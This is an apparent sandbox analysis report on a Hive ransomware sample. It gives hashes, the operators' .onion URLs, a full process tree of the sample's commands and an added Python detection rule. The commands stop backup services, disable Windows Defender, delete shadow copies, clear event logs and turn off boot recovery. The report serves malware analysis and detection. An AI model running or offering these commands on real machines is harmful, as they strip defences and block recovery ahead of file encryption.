Analysis
max time kernel: 125s
max time network: 136s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 13:50
Static task: static1
Behavioral task: behavioral1
Sample: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
Resource: win7-en-20211208
General
Target: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
Size: 2.8MB
MD5: eaca98262691a07d6251902bcbdc1083
SHA1: 64cda1eb126efe6f2217a5a8a86baac17e09554d
SHA256: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402
SHA512: d564fabffd1af3c798d3df293f7e945decb68243e0e015445ca470091c0fc1db8bcf7e1f8947d00791b3073e578f9edc50dbe1418672ccc71d9c130a34cb00ca
Malware Config
Extracted from: C:\Program Files\7-Zip\8Axs_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
PID 3164: MpCmdRun.exe
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
PID 784: bcdedit.exe
PID 3796: bcdedit.exe
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe: File renamed C:\Users\Admin\Pictures\InvokeFormat.crw => C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe: File opened for modification C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe: File renamed C:\Users\Admin\Pictures\PublishInstall.png => C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe: File opened for modification C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
PID 5104: vssadmin.exe
-
Modifies registry class 3 IoCs
Processes:
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
PID 520: powershell.exe
PID 520: powershell.exe
PID 520: powershell.exe
PID 2916: powershell.exe
PID 2916: powershell.exe
PID 2916: powershell.exe
PID 3440: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
PID 3440: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Processes
-
Legend: [n] is the depth in the process tree (1 = the submitted sample, 2 = its direct children, 3 = grandchildren); "cmd:" is the captured command line; indented "-" items are the sandbox signatures raised by that process.

[1] PID 3440  C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"
    - Modifies extensions of user files
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] PID 3052  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 3176  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
  [2] PID 4040  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 4080  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] PID 4300  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 4252  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] PID 4240  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 4376  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] PID 4432  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 4340  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "vmicvss" /y
  [2] PID 4328  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 760  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "VSS" /y
  [2] PID 3232  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 3808  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
  [2] PID 2136  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 3272  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
  [2] PID 3268  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "UnistoreSvc_12e93" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 644  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12e93" /y
  [2] PID 812  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SamSs" start= disabled
  [2] PID 3864  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SDRSVC" start= disabled
  [2] PID 1064  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SstpSvc" start= disabled
  [2] PID 1276  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "UI0Detect" start= disabled
  [2] PID 1496  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "vmicvss" start= disabled
  [2] PID 1704  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "VSS" start= disabled
  [2] PID 1904  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "wbengine" start= disabled
  [2] PID 2160  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "WebClient" start= disabled
  [2] PID 2480  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "UnistoreSvc_12e93" start= disabled
  [2] PID 2688  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 2632  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] PID 3124  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] PID 2600  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] PID 4836  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] PID 1088  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 4960  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] PID 4684  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] PID 2980  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 4892  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] PID 4588  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] PID 4748  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] PID 2956  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] PID 5088  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] PID 604  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 752  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 4604  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] PID 4936  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] PID 4496  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] PID 2192  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] PID 2008  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] PID 3848  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] PID 1940  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] PID 2304  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] PID 2812  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] PID 3056  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] PID 4732  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] PID 2252  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 2316  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 3028  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 3724  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 3840  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service
  [2] PID 3280  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 5104  C:\Windows\SYSTEM32\vssadmin.exe
      cmd: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
  [2] PID 4120  C:\Windows\SYSTEM32\wevtutil.exe
      cmd: wevtutil.exe cl system
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 2924  C:\Windows\SYSTEM32\wevtutil.exe
      cmd: wevtutil.exe cl security
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4004  C:\Windows\SYSTEM32\wevtutil.exe
      cmd: wevtutil.exe cl application
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4248  C:\Windows\System32\Wbem\wmic.exe
      cmd: wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4360  C:\Windows\System32\Wbem\wmic.exe
      cmd: wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 784  C:\Windows\SYSTEM32\bcdedit.exe
      cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
  [2] PID 3796  C:\Windows\SYSTEM32\bcdedit.exe
      cmd: bcdedit.exe /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
  [2] PID 3808  C:\Windows\SYSTEM32\cmd.exe
      cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [3] PID 3164  C:\Program Files\Windows Defender\MpCmdRun.exe
        cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        - Deletes Windows Defender Definitions
  [2] PID 3116  C:\Windows\SYSTEM32\cmd.exe
      cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [3] PID 520  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses
  [2] PID 2776  C:\Windows\SYSTEM32\cmd.exe
      cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [3] PID 2916  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
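The process tree above is, in effect, a complete detection corpus for Hive's pre-encryption stage: every command line belongs to one of five tactics (stopping backup-related services, disabling Defender, deleting shadow copies, clearing event logs, and disabling boot recovery). The following Python triage rule is an added example, not part of the sandbox report and not the sample's own code. It takes a batch of process-creation command lines from one host (for instance the CommandLine field of Sysmon event 1 or Security event 4688), tags each line with the tactic it matches, and only raises a verdict when several distinct tactics fire, so that a lone `net stop` from an administrator does not trip it. The rule names, regular expressions and the three-category threshold are this example's own choices; the sample input is a constructed list containing one representative command line per tactic copied from the tree above, plus one benign line as a control.

```python
import re
from collections import Counter

# Constructed sample input: one representative command line from each stage
# of the process tree above, plus a benign line as a control.
SAMPLE_CMDLINES = [
    'net.exe stop "VSS" /y',
    'sc.exe config "VSS" start= disabled',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f',
    'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable',
    '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    'vssadmin.exe delete shadows /all /quiet',
    'wmic.exe shadowcopy delete',
    'wevtutil.exe cl security',
    'bcdedit.exe /set {default} recoveryenabled no',
    'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures',
    'notepad.exe C:\\Users\\Admin\\notes.txt',  # benign control line (constructed)
]

# Rule names and patterns are this example's own; each pattern targets one of
# the pre-encryption steps visible in the tree.
RULES = [
    ("stop_backup_services",
     re.compile(r'\bnet1?(\.exe)?\s+stop\b'
                r'|\bsc(\.exe)?\s+config\b.*\bstart=\s*disabled\b', re.I)),
    ("defender_tamper",
     re.compile(r'Windows Defender'
                r'|\\Services\\(WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend|SecurityHealthService)\b'
                r'|MpCmdRun\.exe.*-RemoveDefinitions'
                r'|Set-MpPreference\s+-Disable'
                r'|Defender(Api|Audit)Logger', re.I)),
    ("shadow_copy_deletion",
     re.compile(r'\bvssadmin(\.exe)?\s+delete\s+shadows\b'
                r'|\bwmic(\.exe)?\s+shadowcopy\s+delete\b', re.I)),
    ("event_log_clearing",
     re.compile(r'\bwevtutil(\.exe)?\s+cl\b', re.I)),
    ("boot_recovery_tamper",
     re.compile(r'\bbcdedit(\.exe)?\s+/set\b.*'
                r'\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b', re.I)),
]

# Number of distinct tactic categories that must fire before a host is called
# "ransomware pre-encryption activity" rather than one odd admin command.
# The value 3 is this example's own choice.
MIN_CATEGORIES = 3


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Score a batch of command lines from one host and return per-rule
    counts, the matched lines with their tags, and the overall verdict."""
    counts = Counter()
    flagged = []
    for line in cmdlines:
        tags = classify(line)
        if tags:
            flagged.append((line, tags))
            counts.update(tags)
    return {
        "counts": dict(counts),
        "flagged": flagged,
        "ransomware_prep": len(counts) >= MIN_CATEGORIES,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for name, n in sorted(result["counts"].items()):
        print(f"{name:24s} {n}")
    if result["ransomware_prep"]:
        print("verdict: ransomware pre-encryption activity")
    else:
        print("verdict: no verdict")
```

Run against the constructed sample, all five categories fire and the verdict is positive; the benign `notepad.exe` line matches nothing. The threshold is the part to tune: on a backup server, `net stop VSS` followed by `vssadmin delete shadows` can be routine maintenance, whereas the Defender registry and `bcdedit` changes in the tree above have no legitimate scripted counterpart and could reasonably alert on their own.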
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5 6e54df56375acaede52048ff2649bac7
SHA1 fe2b2651742a059072d9bd875137d50232af1479
SHA256 7d7d9f0bdc84d4e934ae983ccc9c5b3339184f8237393dc1daffba4be48d72d1
SHA512 883e18d16a027b2272dbd4437bf078996edee77ff432679987551565c9f15da7b57c18c53429984a9038c654c2fbbbaf2cb8f080067e5c9cb6bb48000cd7d0c2